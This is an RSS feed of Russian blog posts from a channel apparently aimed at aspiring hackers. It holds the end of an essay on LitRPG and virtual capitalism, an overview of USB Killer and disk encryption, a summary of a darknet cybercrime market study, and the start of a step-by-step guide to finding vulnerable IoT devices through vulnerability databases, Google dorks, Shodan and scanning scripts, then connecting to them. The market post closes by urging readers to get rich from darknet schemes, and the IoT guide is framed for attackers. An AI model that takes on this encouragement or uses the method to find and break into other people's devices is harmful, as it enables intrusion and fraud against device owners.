  <p id="UdBX"><strong>Таким образом, онлайн-игру («онлайн-жизнь»?) можно рассматривать как своеобразное капиталистическое предприятие, а вернее «капитализм в капитализме». </strong>Речь идет о капитализме конкурирующих миров, в которых «рабочий класс» отчужден от средств производства (игрового механизма). Не является здесь «рабочий» и тем, кто ставит перед собой реальные жизненные цели – то есть полноправным субъектом. Напротив, как и в современном обществе потребления, игровой «рабочий» трудится (а работа здесь неотличима от игры) для того, чтобы удовлетворять потребности, которые сам же игровой капитализм и порождает. В этой схеме нет ничего нового. Индивиды оказываются полностью отчужденными, зомбированными потребителями.</p>
  <figure id="zlLy" class="m_column">
    <img src="https://teletype.in/files/c7/c700dd3c-2b50-4b60-b513-6d5d1e06caa1.jpeg" width="1280" />
  </figure>
  <h3 id="O5iz"><strong>Утилизация рабочей силы капитализмом или рабочая сила, утилизирующая саму себя?</strong></h3>
  <p id="PwVw">Однако тенденции, подспудно вдохновляющие авторов ЛитРПГ, не обязательно воплотятся именно в том виде, в котором они описаны. Во многих текстах виртуальные миры выступают в качестве своеобразного отстойника, в который капиталисты «сливают» ненужную рабочую силу.<strong> Виртуальные миры – это вроде бы не очень хорошо (а может быть и очень плохо), ведь в люди в них отчуждаются не только от «средств производства», но и от реальной реальности.</strong> То есть во всех бедах оказывается виновной капиталистическая система. Общество сталкиваемся с реальной возможностью построить светлое посткапиталистическое будущее, в котором ценятся и развиваются творческие способности каждого, а в итоге капитализм уводит нас в виртуально-потребительскую бездну. Где-то в виртуальных мирах люди может быть и оказываются героями эпических сражений, но их подлинная реальность представляет собой жалкое зрелище уязвимых существ, закутавшихся в виртуальные коконы. Средством производства становится еще и здравый разум тех, кто живет в реальном, а не виртуальным мире.</p>
  <p id="D85p">Описанный сценарий допускает, что утилизация рабочей силы в мусорное ведро виртуальных миров происходит тогда, когда реальный капитализм будто бы исчерпал себя сам. Будто бы речь идет о сохранении культурного базиса капитализма в виртуальном пространстве. Требуется также сохранить и потребительскую психологию, но «потребитель времен расцвета «потребительского общества» – модель устаревшая. Его проблема состоит в том, что он «слишком много жрет и слишком много гадит, и у него слишком много всякого барахла и хлама, которое, просуществовав какое-то время у него дома без пользы и смысла, отправляется на свалку и там отравляет окружающую среду».</p>
  <figure id="gANI" class="m_column">
    <img src="https://teletype.in/files/01/01901756-04bd-45df-8035-2c94cea95f00.png" width="1920" />
  </figure>
  <h2 id="PVgr"><strong>Одной из тенденций, характерных для современности, является рост числа одиноких людей.</strong></h2>
  <p id="rMdw">Показательно, что образ жизни многих одиночек очень хорошо вписывается в картину будущего общества людей, переселяющихся в виртуальное пространство. Не менее показательно и то, что среди аргументов в пользу жизни соло не последнее место занимает возможность тратить меньше ресурсов и энергии. В такой перспективе грядущее переселение в маленькую виртуальную капсулу, стоящую в маленькой и экономичной квартирке, представляется всего лишь последовательным развитием уже имеющей место тенденции.</p>
  <p id="BmzP"><strong>В виртуальном мире, который оказывается мусорным ведром (а, может быть – отстойником) истории, устаревший потребитель может продолжить потребление, и даже потребление престижное, но оно оказывается гораздо менее затратным, чем реальное.</strong></p>
  <p id="ugmH">Далее, чтобы отправить лишних людей в виртуальное пространство, их убеждают в том, что виртуальные миры столь же реальны, как и настоящие, хотя бы по степени своей экономической значимости. Необходимо, чтобы в виртуальных мирах оставались капиталистические ценности: псевдотрудовая этика и потребительская психология. Обе они скрываются под маской мира, призванной законсервировать значительную часть человечества в состоянии «предыстории», в котором люди по-прежнему сражаются за власть и богатство.</p>
  <h2 id="VPGM"><strong>ММОРПГ сегодня</strong></h2>
  <p id="kbPP"><strong>ММОРПГ уже сегодня служит психологическому замещению</strong>. Игра создает иллюзию личностной самореализации. И литрпг показывает нам это вполне наглядно. В сущности, новеллизации ММОРПГ – это попытки игроков представить отупляющее игровое пространство в ином, более интересном, виде сказочного эпоса. Это есть отчаянная попытка каким-то образом вообразить данное пространство более реальным. Однако сами по себе современные ММОРПГ, вроде World of Warcraft, Lineage 2 и многих других, представляют собой незамысловатые последовательные схемы достижения «успеха». Здесь нет никаких непредсказуемых факторов, все предельно упорядочено, а потому игра предстает как непрерывный поток небольших порций удовольствия.</p>
  <p id="PeZ6">Поэтому, как отмечают многие исследователи:</p>
  <blockquote id="BQIO">«Более низкая ценность общественного признания для игроков с интернет-зависимым поведением можно объяснить тем, что ролевая онлайн-игра позволяет в достаточной степени компенсировать недостаток реализации данной потребности в реальной жизни».</blockquote>
  <p id="RczX"><strong>Иными словами, уже в рамках современного капитализма вырос тип потребителя-рантье,</strong> который охотно может удовлетвориться виртуальной, психологической и символической компенсацией того, чего он не может позволить себе в реальности.</p>
  <h2 id="oZDO"><strong>Вместо заключения</strong></h2>
  <p id="5S80"><strong>Итак, ЛитРПГ, на наш взгляд, является весьма интересным предметом для футурологических исследований политических и социальных трендов. Да и просто почитать вполне себе можно.</strong> В произведениях ЛитРПГ даются некоторые «предсказательные» намеки и описание некоторых аспектов жизни в будущем, из которых можно сделать выводы о том, каким предстанет мир будущего, утративший насущную потребность в труде. Картины этого мира предполагают возникновение нового механизма отчуждения в капиталистическом по своему существу обществе – отчуждения от реальной реальности в виртуальных игровых пространствах.</p>
  <p id="cLTp"><strong>Однако мы полагаем, что процессы, описанные в произведениях жанра ЛитРПГ, зайдут значительно дальше, чем это может представляться их авторам. Виртуализация капитализма ради сохранения в будущем не является пределом его возможной трансформации.</strong></p>
  <p id="Ustv">Капиталист по духу – это тот, кто, заполучив лучший «участок земли», попытается выжать из него максимальный «урожай»; рантье же, напротив, подстраивается под уже доступную ренту и стремится снизить прилагаемые усилия. Стремясь к легко доступным прибылям на «более плодородных» виртуальных «землях», капитализм будет вынужден следовать этой господствующей установке. Максимизаторам и инвесторам останется только придумывать более изощренные способы извлечения прибыли там, где исчезает подлинное трудолюбие и творчество.</p>
  <h2 id="lLvm"><strong>Сегодня мы подняли достаточно серьёзную тему. Оставайтесь с нами, делитесь с друзьями, делитесь своими мыслями. Дальше - ещё интереснее.</strong></h2>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/HJTJKd14Q</guid><link>https://teletype.in/@redterror/HJTJKd14Q?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/HJTJKd14Q?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Экстренное стирание информации как способ защиты от несанкционированного доступа. Ч.2.</title><pubDate>Mon, 26 Nov 2018 17:26:56 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/a8/a87409d6-19a2-4269-a687-caee03f088a7.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/26/268d7cbf-a868-4715-b847-7b77eb18c1e3.jpeg"></img>Нихау, бегущие в тенях! Привет, случайный подписчик. Как и обещал, продолжение информационной статьи, посвящённой экстренному удалению данных со своего ПК.]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/26/268d7cbf-a868-4715-b847-7b77eb18c1e3.jpeg" width="512" />
  </figure>
  <p><strong>Нихау, бегущие в тенях! Привет, случайный подписчик. Как и обещал, продолжение информационной статьи, посвящённой экстренному удалению данных со своего ПК.</strong></p>
  <p><strong>Незаметный убийца USB Killer </strong></p>
  <p><strong>Аппаратное устройство названное USB Killer</strong> и выглядящее как вполне обычная USB-флеш память, впервые было представлено автором Dark_Purple в статье <a href="http://habrahabr.ru/post/251451/" target="_blank">обзоре на «Хабре»</a> опубликованной в феврале 2015 года. Это устройство способна вывести из строя практически любую материнскую плату или USB-порт. Как сам автор описывал принцип работы устройства: «<em>При подключении к USB порту запускается инвертирующий DC/DC преобразователь и заряжает конденсаторы до напряжения -110в, при достижении этого напряжения DC/DC отключается и одновременно открывается полевой транзистор через который -110в прикладываются к сигнальным линиям USB интерфейса. Далее при падении увеличении напряжения на конденсаторах до -7в транзистор закрывается и запускается DC/DC. И так в цикле пока не пробьётся всё и вся»</em>.</p>
  <p><strong>Вторая версия USB Killer 2.0  претерпела некоторые модификации</strong> и отличается большей компактностью. Кроме того, «выходное» напряжение было увеличено до весомых 220В, что только увеличило убойную силу. В остальном принцип работы устройства остался прежним.</p>
  <p><strong>Недавно появилась новость , о поступлении в продажу аналогичного устройства,</strong> но уже названного USB Killer, производителем которой на сей раз выступает некая компания из Гонконга. Помимо этого гонконгская компания представила второй девайс - <a href="https://www.usbkill.com/usb-killer/9-usb-killer-tester.html" target="_blank">Test Shield</a> , который можно использовать вместе с «<em>флешкой-убийцей</em>». По заверениям разработчиков он предохранит принимающую сторону от повреждений. Оба гаджета уже доступны для заказа, при этом цена на USB Killer 49,95 евро, а Test Shield обойдется в 13,95 евро.</p>
  <p><strong>В настоящий момент для пользователей доступны защищенные флеш </strong>накопители «<strong>Samurai Flash Drive</strong>» и «<strong>Samurai Flash Drive Nano</strong>» разработчика <a href="http://efsol.ru/promo/destruction-information.html" target="_blank">ElSof</a> . Девайс выполнены в стандартном форм факторе для USB и HDD-накопителей. Помимо защищенного корпуса предлагают пользователю ряд уникальных фич:</p>
  <ul>
    <li>Ввод пароля на корпусе устройства.</li>
    <li>Аппаратно-программное шифрование информации.</li>
    <li>Экстренное удаление информации без подключения к источнику питания.</li>
    <li>Функция «Пароль под принуждением».</li>
  </ul>
  <p><strong>С такими девайсам можно быть уверенным в защите своих данных.</strong> Помимо стандартных опций шифрования и аппаратного ввода пароля, в случае экстренной необходимости все данные содержащиеся на накопителе могут быть гарантированно удалены. Речь, конечно, в данном случае идет о программных методах.</p>
  <p><strong>Шифрование и программное удаление информации.</strong></p>
  <p>Одним из доступных большинству и эффективных вариантов скрытия (не уничтожения!) информации на носителях в случае экстренной необходимости является программное <a href="https://ru.wikipedia.org/wiki/%D0%A8%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5_%D0%B4%D0%B8%D1%81%D0%BA%D0%B0" target="_blank">шифрование дисков</a> .</p>
  <p>Итак, давайте определимся, что <strong>шифрование диска</strong> — использование специальной технологии защиты информации, переводящая данные на диске в <strong>нечитаемый</strong> код, который нелегальный пользователь не сможет легко расшифровать. Для шифрования диска используется специальное программное или аппаратное обеспечение, которое шифрует каждый бит хранилища.</p>
  <p>Большинство современных программных средств шифрования поддерживают так называемый <strong><em>прозрачный режим</em>. <em>Прозрачное шифрование (Transparent encryption)</em></strong>, также называемое шифрованием в реальном времени (real-time encryption) или шифрованием на лету (on-the-fly encryption) — это метод, использующий программное обеспечение для шифрования диска. Само слово <strong>«прозрачный»</strong> означает, что данные автоматически зашифровываются или расшифровываются при чтении или записи, для чего как правило требуется работа с <a href="https://ru.wikipedia.org/wiki/%D0%94%D1%80%D0%B0%D0%B9%D0%B2%D0%B5%D1%80" target="_blank">драйверами</a>.</p>
  <p>Существует несколько способов организации <strong>прозрачного шифрования</strong>:</p>
  <ul>
    <li>шифрование разделов</li>
    <li>шифрование на уровне файлов.</li>
  </ul>
  <p>Примером первого может быть шифрование всего диска, а второго — шифрованная файловая система ( <a href="https://ru.wikipedia.org/wiki/%D0%A8%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D1%84%D0%B0%D0%B9%D0%BB%D0%BE%D0%B2%D0%B0%D1%8F_%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0" target="_blank">Windows EFS</a> ). В первом случае, вся файловая система на диске находится в зашифрованном виде (названия папок, файлов их содержимое и метаданные), и без корректного ключа нельзя получить доступ к данным. Во втором, шифруются только данные выбранных файлов.</p>
  <p>Модели использования технологии шифрования</p>
  <p>И так, давайте кратко рассмотрим основные технологии шифрования данных:</p>
  <ul>
    <li><strong>Пофайловое шифрование.</strong> Пользователь сам выбирает файлы, которые следует зашифровать. Такой подход не требует глубокой интеграции средства шифрования в систему в ОС, довольно прост в эксплуатации.</li>
    <li><strong>Шифрование каталогов.</strong> Пользователь создает папки, все данные в которых шифруются автоматически. В отличие от предыдущего подхода шифрование происходит на лету, а не по требованию пользователя. Это так называемое &quot;прозрачное шифрование&quot;. Такой подход требует глубокого взаимодействия с операционной системой, поэтому зависит от используемой платформы.</li>
    <li><strong>Шифрование виртуальных дисков.</strong> Шифрование виртуальных дисков подразумевает создание большого скрытого файла на жестком диске. Этот файл в дальнейшем доступен пользователю как отдельный диск (операционная система «видит» его как новый логический диск). Все сведения, хранящиеся на виртуальном диске, находятся в зашифрованном виде.</li>
    <li><strong>Шифрование системного диска.</strong> В этом случае шифруется абсолютно все: загрузочный сектор Windows, все системные файлы и любая другая информация на диске.</li>
    <li><strong>Защита процесса загрузки ОС.</strong> Если зашифрован весь диск целиком, то операционная система не сможет запуститься, пока какой-либо механизм не расшифрует файлы загрузки. Поэтому шифрование всего диска обязательно подразумевает и защиту процесса загрузки. Обычно пользователю требуется ввести пароль, чтобы операционная система могла стартовать. Примером такого использования воспоется технология Windows BitLocker.</li>
  </ul>
  <p><strong>Примеры использования специальных технологий и ПО для шифрования. </strong></p>
  <p><strong>1. Использование технологии Anti-Theft для нотубуков.</strong></p>
  <p><strong><a href="http://www.intel.com/content/www/us/en/architecture-and-technology/anti-theft/anti-theft-general-technology.html" target="_blank">Intel® Anti-Theft Technology</a> позволяет произвести блокировку ноутбука перед загрузкой ОС.</strong> Даже замена жесткого диска злоумышленником будет неэффективной для обхода механизма защиты. Для обеспечения доступа к компютеру требуется авторизация, которая выполняется следом за прохождением процедуры самотестирования POST после включения, но перед обращением к главной загрузочной записи на диске MBR. Для этого используется модуль Pre-Boot authentication (PBA), который находится в чипсете и управляется на уровне BIOS. Именно в PBA реализован механизм, который определяет (получает) команду, что ПК утерян или украден.</p>
  <p><strong>2. Биометрическая защита ноутбуков и смартфонов.</strong></p>
  <p><strong>Компьютеры, а в последнее время смартфоны, планшеты и другие гаджеты </strong>с биометрическим модулем (сканером) при загрузке-разблокировке вместо пароля запрашивают отпечаток пальца владельца. Если сенсорное устройство сломалось и им нельзя воспользоваться, эта процедура будет пропущена, и пользователю предлагается ввести свой логин и пароль. Одной из первых подобное решение под названием VeriFace реализовала компания Lenovo в своих ноутбуках серии IdeaPad. Стоит также отметить аналогичные решения Asus SmartLogon и Toshiba Face Recognition. Биометрическими решениями разблокировки смартфонов хорошо прославились компании Apple и Samsung.</p>
  <p><strong>3. Технологии самошифруемых дисков в переносных устройствах хранения.</strong></p>
  <p><strong>Самошифруемый диск (англ. SED)</strong>— это, как правило переносной USB-диск, шифрование которого реализовано на методах аппаратного шифрования и полного шифрования диска с учетом того, что контроллер устройства хранения содержит в себе аппаратную микросхему для шифрования. Такие диски продаются различными производителями, например Seagate, Western Digital, Samsung, и др. Как правило используется алгоритм шифрования Advanced Encryption Standard (AES).</p>
  <p><strong>4. Программное обеспечение для шифрования. </strong></p>
  <ul>
    <li><a href="https://technet.microsoft.com/en-us/library/cc732774(v=ws.11).aspx" target="_blank">BitLocker Drive Encryption</a> — проприетарная технология, являющаяся частью операционных систем Microsoft Windows, позволяет защищать пользовательские данные путём полного шифрования дисков (начиная с Windows 7 еще и карт SD и USB-флешек).</li>
    <li><a href="http://truecrypt.sourceforge.net/" target="_blank">TrueCrypt</a> — наиболее популярная и заслужившее доверие программа для шифрования на «лету» для 32- и 64-разрядных операционных систем . Позволяет создавать зашифрованный логический (виртуальный) диск, хранящийся в виде файла. С помощью TrueCrypt также можно полностью шифровать раздел жёсткого диска или иного носителя информации, включая съемные USB-накопители. Все сохранённые данные в томе TrueCrypt полностью шифруются, включая имена файлов и каталогов. Смонтированный том TrueCrypt подобен обычному логическому диску.</li>
    <li><a href="https://habrahabr.ru/company/cybersafe/blog/248843/" target="_blank">CyberSafe</a> - еще одна популярная программа с помощью которой можно шифровать не только отдельные файлы. Программа позволяет зашифровать целый раздел жесткого диска или весь внешний диск (например, USB-диск или флешку). В этой статье будет показано, как зашифровать и скрыть от посторонних глаз зашифрованный раздел жесткого диска.</li>
    <li><a href="http://www.aladdin-rd.ru/catalog/secret_disk/enterprise/" target="_blank">Secret Disk</a> - коммерческая отечественная программа от разработчика <a href="http://www.aladdin-rd.ru/" target="_blank">Алладин РД</a> , обеспечивает защиту данных путём шифрования разделов на жёстких дисках, томов на динамических дисках, виртуальных дисков, отдельных папок с файлами и создания защищённых контейнеров. Одним из преимуществ продукта является отсутствие встроенных средств шифрования. Решения на основе Secret Disk не подпадают под законодательные ограничения по распространению и не требуют наличия соответствующих лицензий ФСБ России.</li>
  </ul>
  <p><strong>В общем, друг, тебе есть чем заняться. А конкретнее, оторвать от дивана жопу и начать хоть что-то делать полезное для обеспечения собственной безопасности.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/Bkq3AXPVX</guid><link>https://teletype.in/@redterror/Bkq3AXPVX?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/Bkq3AXPVX?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Рынок преступных кибер услуг. Спрос ВТРОЕ превышает предложение.</title><pubDate>Mon, 26 Nov 2018 17:26:40 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/58/58fbe46d-dbb2-40a7-b824-c21358513b96.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/f3/f3599382-2553-4e85-a90e-26eb3dbe4cc2.jpeg"></img>Нихау, бегущие в тенях! Привет, случайный подписчик. ShadowRun даёт ответ на главный вопрос: &quot;Есть ли бабки в интернете?&quot;]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/f3/f3599382-2553-4e85-a90e-26eb3dbe4cc2.jpeg" width="1280" />
  </figure>
  <p><strong>Нихау, бегущие в тенях! Привет, случайный подписчик. <a href="https://t.me/joinchat/AAAAAEWEtm5wXT-zx05Y1w" target="_blank">ShadowRun</a> даёт ответ на главный вопрос: &quot;Есть ли бабки в интернете?&quot;</strong></p>
  <p><strong>Поехали:</strong></p>
  <p>Есть! И много! Так много, что схемы мутятся, лавэха крутится, лох не переводится. В этой статье я расскажу вам, на хрена мы изучаем всю эту лабуду в моём канале. Итак, имеющий глаза - увидит, имеющий мозги - поймёт, имеющий желание - начнёт действовать.</p>
  <p><strong>Эксперты Positive Technologies</strong> исследовали более 12000 предложений теневого рынка кибер услуг. Анализ выявил, что спрос на услуги по созданию вредоносного ПО втрое превышает предложение. Самым дорогим из доступного на преступном киберрынке в виде готовых, «пакетных» предложений является ВПО для банкоматов. Также проведенный анализ продемонстрировал тенденцию к усложнению атрибуции атак в будущем.</p>
  <p><strong>Специалисты изучили 25 русско- и англоязычных площадок дарквеба</strong> с общим числом зарегистрированных пользователей около 3 млн человек. В ходе анализа оценивались полнота представленных инструментов и услуг, их достаточность для проведения реальной кибератаки. Это позволило, в числе прочего, оценить, насколько необходим киберпреступнику <strong>широкий спектр специализированных знаний,</strong> или для реализации любого типа атаки достаточно обратиться к представителям теневого рынка.</p>
  <p><strong>Специалисты оценили минимальную и среднюю стоимость</strong> различных инструментов и услуг, которые продаются на таких площадках. Так, например, взлом сайта с получением полного контроля над веб-приложением обойдется злоумышленнику всего в 150 $, а стоимость целевой атаки на организацию в зависимости от сложности может превысить 4500 $. Наиболее дорогим оказалось ВПО для проведения логических атак на банкоматы (данная схема будет рассмотрена в этом канале чуть позже). Цены на готовое ВПО этого класса начинаются от 1500 $.</p>
  <p>Эксперты выяснили, что на рынке преступных киберуслуг широко распространены <strong>криптомайнеры (20%), хакерские утилиты (19%), ВПО для создания ботнетов (14%), RAT (Remote Access Trojans, троянские программы для удаленного доступа) и трояны-вымогатели (доля каждого ― 12%)</strong>, а основным спросом закономерно пользуются услуги, связанные с разработкой и распространением <strong>ВПО (55%).</strong></p>
  <p><strong>Проведенное исследование показало, что спрос на услуги по созданию ВПО на сегодняшний день превышает предложение в три раза, а по его распространению ― в два раза.</strong> Такое положение дел позволяет говорить о востребованности среди киберпреступников новых инструментов, которые становятся все доступнее благодаря партнерским программам, сервисам по аренде ВПО и моделям распространения «как услуга».</p>
  <p>Как сообщают эксперты, большая часть запросов на взлом в дарквебе имеет отношение к поиску уязвимостей на сайтах (36%) и получению паролей от электронной почты (32%). Среди предлагаемых услуг лидируют взлом учетных записей социальных сетей (33%) и электронной почты (33%). Аналитики Positive Technologies связывают эти данные с желанием одних людей получить доступ к переписке других. С другой стороны, эти взломы меньше других требуют от атакующего каких-либо технических навыков.</p>
  <blockquote>«<em>Активность теневого рынка, которую продемонстрировал данный анализ, заставляет нас постоянно адаптировать используемые подходы к расследованию киберинцидентов</em>, ― отметил руководитель экспертного центра безопасности Positive Technologies Алексей Новиков. ― <em>Результаты такого мониторинга учитываются при детальном анализе техник и тактик, которые применял преступник в каждом конкретном случае. Глубокое понимание инструментария злоумышленника невозможно без его детального изучения, в том числе и за счет исследования трендов теневого рынка, то есть до того, как соответствующие артефакты встретятся в ходе расследования. Возможно, это даже позволит понять, на что будут нацелены атакующие в ближайшее время, в зависимости, например, от частоты покупки того или иного инструмента</em>».</blockquote>
  <p><strong>Господа, киберсталкеры! Надеюсь вы сделали правильные выводы. В даркнете полно денег и схем, помогающих их получить. Для этого всего лишь нужно повджобывать, сидя на родном диване и подучиться. Бабло само себя к вам не притащит. Ваша задача - взять эти деньги. Наша задача - помочь вам в этом своими статьями, схемами и обучением.</strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/ryc399iwX</guid><link>https://teletype.in/@redterror/ryc399iwX?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/ryc399iwX?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Поиск и взлом уязвимых устройств интернета вещей. Ч.1.</title><pubDate>Mon, 26 Nov 2018 17:26:26 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/c1/c195e24e-498f-455c-b840-11306bdea08a.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/0c/0c7c7b38-24f0-4c44-aedc-3f723dd4f1f8.jpeg"></img>Шалом, бегущие в тенях! Привет, случайный подписчик. Когда читаешь новости про недавно обнаруженные уязвимости или смотришь выступления на хакерских конференциях, то складывается впечатление, что сегодня все подключено к интернету и легко взламывается. Причем часто для взлома не требуется ни высокой квалификации, ни специализированного оборудования. Давайте выясним на практике, так ли это на самом деле!]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/0c/0c7c7b38-24f0-4c44-aedc-3f723dd4f1f8.jpeg" width="1140" />
  </figure>
  <p><strong>Шалом, бегущие в тенях! Привет, случайный подписчик. Когда читаешь новости про недавно обнаруженные уязвимости или смотришь выступления на хакерских конференциях, то складывается впечатление, что сегодня все подключено к интернету и легко взламывается. Причем часто для взлома не требуется ни высокой квалификации, ни специализированного оборудования. Давайте выясним на практике, так ли это на самом деле!</strong></p>
  <p><strong>Поехали:</strong></p>
  <p>Статья написана в исследовательских целях. Вся информация носит ознакомительный характер. Ни автор статьи, ни администрация не несет ответственности за неправомерное использование полученных из статьи знаний.</p>
  <p><strong>Миллиарды потенциальных целей</strong></p>
  <p><strong>По данным Statista.com, объем рынка интернета вещей в 2017 году</strong> превысил миллиард долларов. Общее число подключенных к интернету устройств оценивается на текущий момент в 23 с лишним миллиарда с перспективой увеличения до 30 миллиардов к 2020 году. После этого аналитическое агентство IHS Markit <a href="https://cdn.ihs.com/www/pdf/IoT_ebook.pdf" target="_blank">прогнозирует</a> нелинейный рост до 125 миллиардов устройств к 2030 году. Такой объем производства вполне возможен, но уже сейчас ударные темпы выпуска IoT-устройств достигаются преимущественно за счет самых дешевых «китайских» девайсов, при разработке которых о безопасности думали в последнюю очередь.</p>
  <p><strong>Среди компонентов умного дома и даже охранных систем</strong> значительная часть имеет проблемы с безопасностью, причем характерные для целой плеяды устройств, а не просто какой-то одной серии не самого надежного вендора. Речь идет о массовых и грубых нарушениях принципов разработки:</p>
  <ul>
    <li>использование неизменяемых (hardcoded) и скрытых сервисных учетных данных;</li>
    <li>применение одинаковых либо легко предсказуемых ключей и ПИН-кодов;</li>
    <li>отсутствие проверки прав доступа при обращении к известной странице настроек (например, /settings.asp в обход /index.htm) или прямого вызова изображений и видеопотока IP-камеры (вроде /axis-cgi/jpg/image.cgi);</li>
    <li>некорректная обработка получаемых данных, вызывающая переполнение буфера. Как следствие, возможно выполнение произвольного кода при получении злонамеренно составленного TCP-пакета;</li>
    <li>принудительное переключение сервера на использование старых версий протоколов по запросу клиентского устройства (я старая глупая железка, давай со мной по-простому);</li>
    <li>десятки других типовых ошибок и намеренных ослаблений безопасности ради удобства конфигурирования неспециалистами (в том числе — удаленного и без надлежащей авторизации).</li>
  </ul>
  <p><strong>Как искать уязвимые IoT-девайсы</strong></p>
  <p><strong>Исследователи предлагают множество</strong> алгоритмов поиска дружественных к хакеру устройств, и самые эффективные из них уже опробованы создателями ботнетов. Я вообще считаю использование уязвимостей в ботнетах наиболее надежным критерием оценки легкости их массовой эксплуатации на практике.</p>
  <p>Кто-то пляшет от прошивки (точнее, тех диких ошибок, которые были обнаружены при ее анализе методами реверс-инжиниринга). Другие в качестве отличительного признака берут название производителя (его можно определить по первым трем октетам MAC-адреса) или версию ОС (большинство устройств сообщают ее в сетевом отклике, в том числе и роботам-паукам поисковиков).</p>
  <p><strong>В любом случае для успешного поиска нам нужен некий отличительный признак уязвимого девайса</strong>, и хорошо бы найти несколько таких маркеров. Поэтому мы предлагаем пойти следующим путем:</p>
  <p><strong>1.</strong> Обращаемся к базе уязвимостей — например, MITRE или <a href="https://www.rapid7.com/db/search?" target="_blank">Rapid7</a> и находим интересующие нас бреши у определенных IoT-девайсов. Наиболее гарантированными в плане использования будут уязвимости следующих типов:</p>
  <ul>
    <li>обнаруженные после того, как производитель прекратил поддержку устройства и выпуск патчей;</li>
    <li>обнаруженные недавно (для которых еще нет исправлений, либо большинство пользователей не успели исправления применить);</li>
    <li>архитектурные баги, плохо исправляемые софтверными патчами и редко устраняемые до конца — вроде уязвимости Spectre, существующей в нескольких разновидностях и актуальной до сих пор;</li>
    <li>влияющие сразу на несколько моделей и даже типов устройств (например, из-за общего компонента веб-интерфейса или уязвимости самого протокола коммуникации).</li>
  </ul>
  <p><strong>2.</strong> Изучаем подробности о найденных уязвимостях и затрагиваемых ими устройствах. Читаем всю доступную документацию в поисках уникальных маркеров и деталей допущенных разработчиком ошибок. Нужно определить особенности, отличающие интересные нам девайсы от массы других подобных. Например, в отклике от уязвимого устройства содержится строка с номером определенной версии ОС, ревизии протокола или у него будет открыт нестандартный порт.</p>
  <p><strong>3.</strong> Составляем продвинутые поисковые запросы для Google (Google Dorks) и специализированных поисковиков по интернету вещей:</p>
  <ul>
    <li>Shodan,</li>
    <li>Censys,</li>
    <li>ZoomEye.</li>
  </ul>
  <p><strong>Для предотвращения наплыва кулхацкеров мы не станем приводить айпишники уязвимых систем, некоторые детали и подробные запросы, позволяющие обнаружить легкие цели в один клик. </strong>Однако разгадка лежит на поверхности. Достаточно внимательно прочитать описание уязвимости и добавить к приведенному примеру один-два поисковых фильтра.Дополнительный отсев недобросовестных исследователей мира IoT выполняют сами сервисы Shodan и Censys. Без регистрации они показывают только первые результаты поиска, ограничивают количество запросов в день и не позволяют их эффективно уточнять. Все самое интересное обычно начинается после первой сотни результатов, а то и дальше.</p>
  <p>Поиск IoT-девайсов легко ускорить за счет скриптов. Например, <a href="https://github.com/RussianOtter/networking/blob/master/8oScanner.py" target="_blank">RussianOtterMult-API Network Scanner</a> или <a href="https://github.com/twelvesec/gasmask" target="_blank">GasMasK</a>. Для их использования (как и для применения собственных скриптов) понадобится регистрация в Shodan и Censys.</p>
  <p><strong>4.</strong> Проверяем цели из поисковой выдачи и (при необходимости) просеиваем ее дополнительными запросами. Такая необходимость возникает практически всегда, поэтому для парсинга результатов часто используют скрипты. Например, вот такой от <a href="https://github.com/thesubtlety/shocens" target="_blank">thesubtlety</a>.</p>
  <p><strong>5.</strong> Подбираем инструментарий для подключения к найденным IoT-девайсам. В большинстве случаев будет достаточно браузера. Для управления камерами и DVR иногда потребуется поставить старую версию Java RE и специфический видеокодек. Часто бывают нужны Telnet- и SSH-клиенты. Реже потребуется софт от разработчика, например <a href="https://blog.talosintelligence.com/2018/04/critical-infrastructure-at-risk.html" target="_blank">Cisco Smart Install Client</a>.</p>
  <p><strong>6.</strong> В зависимости от того, как далеко вы намерены зайти, ограничиваемся сбором статистики или выполняем тестовое подключение и пробуем менять настройки. Последнее не рекомендуется делать, в том числе и потому, что вы с легкостью можете нарваться на ловушку (honeypot). Интерполу тоже надо поднимать показатели раскрываемости преступлений в сфере ИБ, а не слишком осторожный исследователь — идеальная цель.</p>
  <p><strong>Приоритетные мишени</strong></p>
  <p>Нам было интересно узнать, что чаще всего становится мишенью в мире IoT. Комментарии на подобный темат мы обнаружили в свободной прессе. Специалист по защите информационных систем компании GS-Labs Егор «Xarlan» Литвинов рассказывает в своём интервью одному из изданий:</p>
  <blockquote><strong>— Егор, как вы считаете, какие девайсы из интернета вещей сегодня имеют самые дырявые прошивки?</strong></blockquote>
  <blockquote>— Что значит «самая дырявая прошивка»? Та, в которой больше всего багов, или та, где есть всего один баг, но его эксплуатация может привести к фатальным последствиям? Наверное, тут поможет список <a href="https://www.owasp.org/index.php/Top_IoT_Vulnerabilities" target="_blank">OWASP Top 10 IoT Vulnerabilities</a>. Он хоть и датирован 2014 годом, но смежный доклад про небезопасность мобильных приложений, звучавший на PHDays 2018, показывает, что очень не зря существует OWASP TOP 10.</blockquote>
  <blockquote><strong>— Можете привести какие-нибудь недавние примеры?</strong></blockquote>
